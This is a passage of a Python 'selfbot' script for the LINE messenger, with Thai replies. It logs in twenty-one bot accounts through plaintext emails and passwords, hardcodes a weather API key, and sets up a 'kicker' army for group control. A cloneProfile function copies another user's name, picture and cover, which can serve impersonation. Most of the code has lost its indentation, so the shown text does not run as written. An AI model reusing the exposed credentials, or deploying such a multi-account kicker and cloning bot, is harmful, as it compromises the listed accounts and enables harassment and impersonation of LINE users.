parser.add_argument('-s', '--systemname', type=str, default='', metavar='', required=False, help='System Name | Example : Chrome_OS')
parser.add_argument('-c', '--channelid', type=str, default='', metavar='', required=False, help='Channel ID | Example : 1341209950')
parser.add_argument('-T', '--traceback', type=str2bool, nargs='?', default=False, metavar='', required=False, const=True, choices=[True, False], help='Using Traceback | Use : True/False')
parser.add_argument('-S', '--showqr', type=str2bool, nargs='?', default=False, metavar='', required=False, const=True, choices=[True, False], help='Show QR | Use : True/False')
args = parser.parse_args()
# Login line
start_runtime = datetime.now()
line = LINE("",appType="CHROMEOS")
kicker = LINE("nirassalatan1@gmail.com","what4130")
print ("===============[PRO 1 LOGIN NOSELF TOKEN]===============\n")
kicker2 = LINE("nirassalatan2@gmail.com","what4130")
print ("===============[PRO 2 LOGIN SUKSES]===============\n")
kicker3 = LINE("nirassalatan3@gmail.com","what4130")
print ("===============[PRO 3 LOGIN SUKSES]===============\n")
kicker4 = LINE("nirassalatan4@gmail.com","what4130")
print ("===============[PRO 4 LOGIN SUKSES]===============\n")
kicker5 = LINE("nirassalatan5@gmail.com","what4130")
print ("===============[PRO 5 LOGIN SUKSES]===============\n")
kicker6 = LINE("nirassalatan6@gmail.com","what4130")
print ("===============[PRO 6 LOGIN NOSELF TOKEN]===============\n")
kicker7 = LINE("nirassalatan7@gmail.com","what4130")
print ("===============[PRO 7 LOGIN SUKSES]===============\n")
kicker8 = LINE("nirassalatan8@gmail.com","what4130")
print ("===============[PRO 8 LOGIN SUKSES]===============\n")
kicker9 = LINE("nirassalatan9@gmail.com","what4130")
print ("===============[PRO 9 LOGIN SUKSES]===============\n")
kicker10 = LINE("nirassalatan10@gmail.com","what4130")
print ("===============[PRO 10 LOGIN SUKSES]===============\n")
kicker11 = LINE("zabakuno1@gmail.com","what4130")
print ("===============[PRO 11 LOGIN SUKSES]===============\n")
kicker12 = LINE("zabakuno2@gmail.com","what4130")
print ("===============[PRO 12 LOGIN SUKSES]===============\n")
kicker13 = LINE("zabakuno3@gmail.com","what4130")
print ("===============[PRO 13 LOGIN SUKSES]===============\n")
kicker14 = LINE("zabakuno4@gmail.com","what4130")
print ("===============[PRO 14 LOGIN SUKSES]===============\n")
kicker15 = LINE("zabakuno5@gmail.com","what4130")
print ("===============[PRO 15 LOGIN SUKSES]===============\n")
kicker16 = LINE("zabakuno6@gmail.com","what4130")
print ("===============[PRO 16 LOGIN SUKSES]===============\n")
kicker17 = LINE("zabakuno7@gmail.com","what4130")
print ("===============[PRO 17 LOGIN SUKSES]===============\n")
kicker18 = LINE("zabakuno8@gmail.com","what4130")
print ("===============[PRO 18 LOGIN SUKSES]===============\n")
kicker19 = LINE("zabakuno9@gmail.com","what4130")
print ("===============[PRO 19 LOGIN SUKSES]===============\n")
kicker20 = LINE("zabakuno10@gmail.com","what4130")
print ("===============[PRO 20 LOGIN SUKSES]===============\n")
g1 = LINE("dtxlcdi@it-simple.net","gaara4130")
print ("===============[PRO Ghost LOGIN SUKSES]===============\n")
client = line
myMid = line.profile.mid
creator = ["u384b0bc30e28b9e7c38b9ad82a8ab9ce"]
owner = ["u384b0bc30e28b9e7c38b9ad82a8ab9ce"]
admin = ["u384b0bc30e28b9e7c38b9ad82a8ab9ce"]
staff = ["u384b0bc30e28b9e7c38b9ad82a8ab9ce"]
Amid = kicker.getProfile().mid
Bmid = kicker2.getProfile().mid
Cmid = kicker3.getProfile().mid
Dmid = kicker4.getProfile().mid
Emid = kicker5.getProfile().mid
Fmid = kicker6.getProfile().mid
Gmid = kicker7.getProfile().mid
Hmid = kicker8.getProfile().mid
Imid = kicker9.getProfile().mid
Jmid = kicker10.getProfile().mid
ga1 = kicker11.getProfile().mid
ga2 = kicker12.getProfile().mid
ga3 = kicker13.getProfile().mid
ga4 = kicker14.getProfile().mid
ga5 = kicker15.getProfile().mid
ga6 = kicker16.getProfile().mid
ga7 = kicker17.getProfile().mid
ga8 = kicker18.getProfile().mid
ga9 = kicker19.getProfile().mid
ga10 = kicker20.getProfile().mid
g1MID = g1.getProfile().mid
KAC = [kicker,kicker2,kicker3,kicker4,kicker5,kicker6,kicker7,kicker8,kicker9,kicker10,kicker11,kicker12,kicker13,kicker14,kicker15,kicker16,kicker17,kicker18,kicker19,kicker20]
ABC = [kicker,kicker2,kicker3,kicker4,kicker5,kicker6,kicker7,kicker8,kicker9,kicker10,kicker11,kicker12,kicker13,kicker14,kicker15,kicker16,kicker17,kicker18,kicker19,kicker20]
Bots = [myMid,Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Jmid,ga1,ga2,ga3,ga4,ga5,ga6,ga7,ga8,ga9,ga10,g1MID]
#Autoadd
armylist = [myMid,Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Jmid,ga1,ga2,ga3,ga4,ga5,ga6,ga7,ga8,ga9,ga10,g1MID]
botlist = [line,kicker,kicker2,kicker3,kicker4,kicker5,kicker6,kicker7,kicker8,kicker9,kicker10,kicker11,kicker12,kicker13,kicker14,kicker15,kicker16,kicker17,kicker18,kicker19,kicker20,g1]
#Autoadd
Ariff = creator + admin + owner + staff + Bots
programStart = time.time()
oepoll = OEPoll(line)
tmp_text = []
lurking = {}
protectqr = []
protectkick = []
protecARoin = []
protectinvite = []
protectcancel = []
protectcanceljs = []
protectantijs = []
ghost = []
numlist= {}
zxcvzx = myMid
with open('protectcancel.json', 'r') as fp:
protectcancel = json.load(fp)
with open('protectcanceljs.json', 'r') as fp:
protectcanceljs = json.load(fp)
with open('protectantijs.json', 'r') as fp:
protectantijs = json.load(fp)
with open('ghost.json', 'r') as fp:
ghost = json.load(fp)
with open('protectinvite.json', 'r') as fp:
protectinvite = json.load(fp)
Setbot3 = codecs.open("wait.json","r","utf-8")
wait = json.load(Setbot3)
settings = livejson.File('setting.json', True, False, 4)
numlist= {}
bool_dict = {
True: ['Yes', 'Active', 'Success', 'Open', 'On'],
False: ['No', 'Not Active', 'Failed', 'Close', 'Off']
}
responsename1 = kicker.getProfile().displayName
responsename2 = kicker2.getProfile().displayName
responsename3 = kicker3.getProfile().displayName
responsename4 = kicker4.getProfile().displayName
responsename5 = kicker5.getProfile().displayName
responsename6 = kicker6.getProfile().displayName
responsename7 = kicker7.getProfile().displayName
responsename8 = kicker8.getProfile().displayName
responsename9 = kicker9.getProfile().displayName
responsename10 = kicker10.getProfile().displayName
responsename11 = kicker11.getProfile().displayName
responsename12 = kicker12.getProfile().displayName
responsename13 = kicker13.getProfile().displayName
responsename14 = kicker14.getProfile().displayName
responsename15 = kicker15.getProfile().displayName
responsename16 = kicker16.getProfile().displayName
responsename17 = kicker17.getProfile().displayName
responsename18 = kicker18.getProfile().displayName
responsename19 = kicker19.getProfile().displayName
responsename20 = kicker20.getProfile().displayName
# Backup profile
profile = line.getContact(myMid)
settings["myProfile"]["displayName"] = profile.displayName
settings["myProfile"]["statusMessage"] = profile.statusMessage
settings["myProfile"]["pictureStatus"] = profile.pictureStatus
cont = line.getContact(myMid)
settings["myProfile"]["videoProfile"] = cont.videoProfile
coverId = line.getProfileDetail()["result"]["objectId"]
settings["myProfile"]["coverId"] = coverId
def sendflex(to, data):
n1 = LiffChatContext(to)
n2 = LiffContext(chat=n1)
view = LiffViewRequest('1602687308-GXq4Vvk9', n2)
token = line.liff.issueLiffView(view)
url = 'https://api.line.me/message/v3/share'
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer %s' % token.accessToken
}
data = {"messages":[data]}
requests.post(url, headers=headers, data=json.dumps(data))
# Check Json Data
def delete_log():
    # Iterate over a copy so entries can be removed while looping; drop
    # messages older than one day (assumes timedelta is available via the
    # star import from important).
    for data in list(msg_dict):
        if (datetime.utcnow() - cTime_to_datetime(msg_dict[data]["createdTime"])) > timedelta(days=1):
            del msg_dict[data]
def restartProgram():
print ('##----- PROGRAM RESTARTED -----##')
python = sys.executable
os.execl(python, python, *sys.argv)
def logError(error, write=True):
errid = str(random.randint(100, 999))
filee = open('tmp/errors/%s.txt'%errid, 'w') if write else None
if args.traceback: traceback.print_tb(error.__traceback__)
if write:
traceback.print_tb(error.__traceback__, file=filee)
filee.close()
with open('errorLog.txt', 'a') as e:
e.write('\n%s : %s'%(errid, str(error)))
print ('++ Error : {error}'.format(error=error))
def command(text):
pesan = text.lower()
if settings['setKey']['status']:
if pesan.startswith(settings['setKey']['key']):
cmd = pesan.replace(settings['setKey']['key'],'')
else:
cmd = 'Undefined command'
else:
cmd = text.lower()
return cmd
def changeVideoAndPictureProfile(pict, vids):
try:
files = {'file': open(vids, 'rb')}
obs_params = line.genOBSParams({'oid': myMid, 'ver': '2.0', 'type': 'video', 'cat': 'vp.mp4'})
data = {'params': obs_params}
r_vp = line.server.postContent('{}/talk/vp/upload.nhn'.format(str(line.server.LINE_OBS_DOMAIN)), data=data, files=files)
if r_vp.status_code != 201:
return "Failed update profile"
line.updateProfilePicture(pict, 'vp')
return "Success update profile"
except Exception as e:
raise Exception("Error change video and picture profile {}".format(str(e)))
def genImageB64(path):
with open(path, 'rb') as img_file:
encode_str = img_file.read()
b64img = base64.b64encode(encode_str)
return b64img.decode('utf-8')
def genUrlB64(url):
return base64.b64encode(url.encode('utf-8')).decode('utf-8')
def removeCmd(text, key=''):
if key == '':
setKey = '' if not settings['setKey']['status'] else settings['setKey']['key']
else:
setKey = key
text_ = text[len(setKey):]
sep = text_.split(' ')
return text_[len(sep[0] + ' '):]
def multiCommand(cmd, list_cmd=[]):
if True in [cmd.startswith(c) for c in list_cmd]:
return True
else:
return False
def replaceAll(text, dic):
try:
rep_this = dic.items()
except:
rep_this = dic.iteritems()
for i, j in rep_this:
text = text.replace(i, j)
return text
def help():
key = '' if not settings['setKey']['status'] else settings['setKey']['key']
with open('help.txt', 'r') as f:
text = f.read()
helpMsg = text.format(key=key.title())
return helpMsg
def helpbot():
with open('helpbot.txt', 'r') as f:
text = f.read()
helpMsg1 = text.format()
return helpMsg1
def parsingRes(res):
result = ''
textt = res.split('\n')
for text in textt:
if True not in [text.startswith(s) for s in ['╭', '├', '│', '╰']]:
result += '\n│ ' + text
else:
if text == textt[0]:
result += text
else:
result += '\n' + text
return result
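# parsingRes() keeps multi-line replies inside the '╭ ├ │ ╰' box used by the
# status and usage messages: any line that does not already start with one of
# those border characters is prefixed with '│ ' so wrapped text stays framed.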
def sendMentionxd(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
line.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
line.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def Musik(to):
contentMetadata={'previewUrl': "http://dl.profile.line-cdn.net/"+line.getContact(myMid).picturePath, 'i-installUrl': 'http://itunes.apple.com/app/linemusic/id966142320', 'type': 'mt', 'subText': line.getContact(myMid).statusMessage if line.getContact(myMid).statusMessage != '' else 'creator By rat |ID LINE|\njamekillover', 'a-installUrl': 'market://details?id=jp.linecorp.linemusic.android', 'a-packageName': 'jp.linecorp.linemusic.android', 'countryCode': 'JP', 'a-linkUri': 'linemusic://open?target=track&item=mb00000000016197ea&subitem=mt000000000d69e2db&cc=JP&from=lc&v=1', 'i-linkUri': 'linemusic://open?target=track&item=mb00000000016197ea&subitem=mt000000000d69e2db&cc=JP&from=lc&v=1', 'text': line.getContact(myMid).displayName, 'id': 'mt000000000d69e2db', 'linkUri': 'https://music.me.me/launch?target=track&item=mb00000000016197ea&subitem=mt000000000d69e2db&cc=JP&from=lc&v=1','MSG_SENDER_ICON': "https://os.me.naver.jp/os/p/"+myMid,'MSG_SENDER_NAME': line.getContact(myMid).displayName,}
return line.sendMessage(to, line.getContact(myMid).displayName, contentMetadata, 19)
def sendMention1(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention2(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker2.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker2.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention3(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker3.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker3.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention4(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker4.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker4.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention5(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker5.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker5.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention6(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker6.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker6.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention7(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker7.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker7.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention8(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker8.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker8.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention9(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker9.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker9.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention10(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker10.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker10.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention11(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker11.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker11.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention12(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker12.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker12.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention13(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker13.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker13.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention14(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker14.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker14.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention15(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker15.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker15.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention16(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker16.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker16.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention17(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker17.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker17.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention18(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker18.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker18.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention19(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker19.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker19.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention20(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker20.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker20.sendMessage(to, "[ INFO ] Error :\n" + str(error))
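# NOTE: sendMention1() .. sendMention20() above are identical apart from which
# kicker client sends the message. A single generic helper like this sketch
# could serve all of them by taking the client as a parameter (hypothetical
# consolidation; the numbered wrappers are kept for compatibility).
def sendMentionWith(client, to, mid, firstmessage, lastmessage):
    try:
        text = "%s " % (str(firstmessage))
        mention = "@x "
        arr = [{'S': str(len(text)), 'E': str(len(text) + len(mention) - 1), 'M': mid}]
        text += mention + str(lastmessage)
        client.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
    except Exception as error:
        client.sendMessage(to, "[ INFO ] Error :\n" + str(error))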
def cloneProfile(myMid):
contact = line.getContact(myMid)
if contact.videoProfile == None:
line.cloneContactProfilev2(myMid)
else:
profile = line.getProfile()
profile.displayName, profile.statusMessage = contact.displayName, contact.statusMessage
line.updateProfile(profile)
pict = line.downloadFileURL('http://dl.profile.line-cdn.net/' + contact.pictureStatus, saveAs="tmp/pict.bin")
vids = line.downloadFileURL( 'http://dl.profile.line-cdn.net/' + contact.pictureStatus + '/vp', saveAs="tmp/video.bin")
changeVideoAndPictureProfile(pict, vids)
coverId = line.getProfileDetail(myMid)['result']['objectId']
line.updateProfileCoverById(coverId)
def backupProfile():
profile = line.getContact(myMid)
settings['myProfile']['displayName'] = profile.displayName
settings['myProfile']['pictureStatus'] = profile.pictureStatus
settings['myProfile']['statusMessage'] = profile.statusMessage
settings['myProfile']['videoProfile'] = profile.videoProfile
coverId = line.getProfileDetail()['result']['objectId']
settings['myProfile']['coverId'] = str(coverId)
def sendTemplate(to, data):
    # Same share flow as sendflex(); use a local name for the chat context so
    # the global `line` client is not shadowed inside this function.
    chatCtx = LiffChatContext(to)
    ratedit = LiffContext(chat=chatCtx)
    view = LiffViewRequest('1602687308-GXq4Vvk9', ratedit)
    token = line.liff.issueLiffView(view)
    url = 'https://api.line.me/message/v3/share'
    headers = {
        'Content-Type': 'application/json',
        'Authorization': 'Bearer %s' % token.accessToken
    }
    data = {"messages":[data]}
    requests.post(url, headers=headers, data=json.dumps(data))
def restoreProfile():
profile = line.getProfile()
profile.displayName = settings['myProfile']['displayName']
profile.statusMessage = settings['myProfile']['statusMessage']
if settings['myProfile']['videoProfile'] == None:
profile.pictureStatus = line.downloadFileURL("http://dl.profile.line-cdn.net/{}".format(settings["myProfile"]["pictureStatus"]), saveAs="tmp/backupPicture.bin")
line.updateProfilePicture(profile.pictureStatus)
line.updateProfile(profile)
else:
line.updateProfile(profile)
pict = line.downloadFileURL('http://dl.profile.line-cdn.net/' + settings['myProfile']['pictureStatus'], saveAs="tmp/pict.bin")
vids = line.downloadFileURL( 'http://dl.profile.line-cdn.net/' + settings['myProfile']['pictureStatus'] + '/vp', saveAs="tmp/video.bin")
changeVideoAndPictureProfile(pict, vids)
coverId = settings['myProfile']['coverId']
line.updateProfileCoverById(coverId)
def time_converter(time):
converted_time = datetime.fromtimestamp(
int(time)
).strftime('%I:%M %p')
return converted_time
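# time_converter() turns a unix timestamp from the weather API into a local
# 12-hour clock string such as '06:15 AM'.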
def url_builder(city_id):
user_api = '6975b23cef6c84e7f26062ef1c913c0d' # Obtain yours form: http://openweathermap.org/
unit = 'metric' # For Fahrenheit use imperial, for Celsius use metric, and the default is Kelvin.
api = 'http://api.openweathermap.org/data/2.5/weather?id=' # Search for your city ID here: http://bulk.openweathermap.org/sample/city.list.json.gz
full_api_url = api + str(city_id) + '&mode=json&units=' + unit + '&APPID=' + user_api
return full_api_url
def data_fetch(full_api_url):
url = urllib.request.urlopen(full_api_url)
output = url.read().decode('utf-8')
raw_api_dict = json.loads(output)
url.close()
return raw_api_dict
def data_organizer(raw_api_dict):
data = dict(
city=raw_api_dict.get('name'),
country=raw_api_dict.get('sys').get('country'),
temp=raw_api_dict.get('main').get('temp'),
temp_max=raw_api_dict.get('main').get('temp_max'),
temp_min=raw_api_dict.get('main').get('temp_min'),
humidity=raw_api_dict.get('main').get('humidity'),
pressure=raw_api_dict.get('main').get('pressure'),
sky=raw_api_dict['weather'][0]['main'],
sunrise=time_converter(raw_api_dict.get('sys').get('sunrise')),
sunset=time_converter(raw_api_dict.get('sys').get('sunset')),
wind=raw_api_dict.get('wind').get('speed'),
        wind_deg=raw_api_dict.get('wind').get('deg'),
dt=time_converter(raw_api_dict.get('dt')),
cloudiness=raw_api_dict.get('clouds').get('all')
)
return data
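# data_organizer() expects the standard OpenWeatherMap "current weather" JSON
# shape (nested 'main', 'sys', 'wind', 'clouds' and 'weather' objects) as
# returned by the endpoint built in url_builder().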
def data_output(to, data, prov):
    # Province code -> display name; every province shares the same report format.
    provinces = {1: 'เชียงใหม่', 2: 'อุบลราชธานี', 3: 'กรุงเทพมหานคร', 4: 'เพชรบูรณ์', 5: 'ขอนแก่น', 6: 'อยุธยา'}
    if prov not in provinces:
        return
    m_symbol = ' °C'
    line.sendMessage(to,"สภาพอากาศ: "+provinces[prov]+"\nอุณหภูมิ: "+str(data['temp'])+m_symbol+"\n(มากสุด: "+str(data['temp_max'])+m_symbol+", น้อยสุด: "+str(data['temp_min'])+m_symbol+")\n\nแรงลม: "+str(data['wind'])+"\nความชื้น: "+str(data['humidity'])+"\nเมฆ: "+str(data['cloudiness'])+"%\nความดัน: "+str(data['pressure'])+"\nดวงอาทิตย์ขึ้น: "+str(data['sunrise'])+"\nดวงอาทิตย์ตก: "+str(data['sunset'])+"\n\nอัพเดทล่าสุด: "+str(data['dt']))
def executeCmd(msg, text, txt, cmd, msg_id, receiver, sender, to, setKey):
if cmd == 'logoutbot':
line.sendMessage(to, 'Bot will logged out')
sys.exit('##----- PROGRAM STOPPED -----##')
elif cmd == 'logoutdevicee':
line.sendMessage(to, 'Bot will logged outdevicee')
line.logout()
sys.exit('##----- line LOGOUT -----##')
elif cmd == 'รีบอท':
line.sendMessage(to, 'กำลังรี😘♪')
restartProgram()
elif cmd == 'help':
line.sendReplyMessage(msg_id,to,help(),{'AGENT_LINK': 'line://ti/p/~jamekillover','AGENT_ICON': 'http://dl.profile.line-cdn.net/'+line.getContact(myMid).pictureStatus,'AGENT_NAME': 'รัตน์'})
elif text.lower() == 'resetlogin':
os.system('clear')
line.sendReplyMessage(msg_id,to," 「 Reset Login 」\nType: Reset Login\nระบบกำลังประมวลผล...",{'AGENT_LINK': 'line://ti/p/~jamekillover','AGENT_ICON': 'http://dl.profile.line-cdn.net/'+line.getContact(myMid).pictureStatus,'AGENT_NAME': 'รัตน์'})
python = sys.executable
os.execl(python, python, * sys.argv)
elif cmd == 'helpbot':
kicker.sendReplyMessage(msg_id, to, helpbot(),contentMetadata={"MSG_SENDER_NAME":"188c17d367a9455e4b60f809f280003d867d4df7188c17d367a9455e7d4df7188c17d367a9455e188c17d367a9455e4b60f809f280003d867d4df7188c17d367a9455e7d4df7188c17d367a9455e5ee8776c4c58a0367a9455e4b60f80358c204u21d04f683a70e","MSG_SENDER_ICON":"https://media.giphy.com/media/T9qJa0lfRjXsQ/source.gif"})
elif cmd == 'speed':
start = time.time()
sendMentionxd(msg.to, sender, "「ความเร็วของคุณคือ...」 ", "")
elapsed_time = time.time() - start
line.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
elif text.lower() == 'myspeed':
time0 = timeit.timeit('"-".join(str(n) for n in range(100))', number=1000)
str1 = str(time0)
start = time.time()
line.sendMessage(to,'ความเร็วในการประมวลผล\n' + str1 + 'วินาที')
elapsed_time = time.time() - start
line.sendMessage(to,'การตอบสนองต่อคำสั่ง\n' + format(str(elapsed_time)) + 'วินาที')
elif cmd == 'me':
key1 = myMid
line.sendReplyMessage(msg_id, to, None, contentMetadata={"MSG_SENDER_NAME":"188c17d367a9455e4b60f809f280003d867d4df","MSG_SENDER_ICON":"https://media.giphy.com/media/T9qJa0lfRjXsQ/source.gif",'mid': key1}, contentType=13)
elif cmd == "me2":
